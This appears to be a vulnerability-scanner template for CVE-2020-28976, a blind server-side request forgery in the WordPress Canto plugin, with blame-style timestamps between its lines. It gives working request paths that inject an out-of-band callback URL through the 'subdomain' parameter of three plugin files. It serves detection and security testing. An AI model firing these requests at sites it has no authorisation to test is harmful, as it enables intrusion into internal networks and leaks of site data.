2022-02-28 20:45:19 +00:00
id : CVE-2020-28976
info :
2023-02-01 16:52:12 +00:00
name : WordPress Canto 1.3.0 - Blind Server-Side Request Forgery
2022-02-28 20:45:19 +00:00
author : LogicalHunter
severity : medium
2023-02-01 17:11:33 +00:00
description : WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-02-28 20:45:19 +00:00
reference :
- https://www.exploit-db.com/exploits/49189
2022-05-17 09:18:12 +00:00
- https://www.canto.com/integrations/wordpress/
- https://github.com/CantoDAM/Canto-Wordpress-Plugin
2023-02-01 16:48:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-28976
2022-02-28 20:45:19 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2022-02-28 20:45:19 +00:00
cve-id : CVE-2020-28976
cwe-id : CWE-918
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:canto:canto:*:*:*:*:*:*:*:*
epss-score : 0.004
2022-08-27 04:41:18 +00:00
tags : cve,cve2020,ssrf,wordpress,wp-plugin,oast,edb
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2022-02-28 20:45:19 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-02-28 20:45:19 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
- "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"
stop-at-first-match : true
2023-03-29 16:24:31 +00:00
matchers-condition : and
2022-02-28 20:45:19 +00:00
matchers :
- type : word
part : interactsh_protocol
words :
2023-02-01 16:48:41 +00:00
- "http"
2023-03-29 16:24:31 +00:00
- type : word
part : body
words :
- "null"
- type : word
part : header
words :
- "application/json"
- type : status
status :
- 200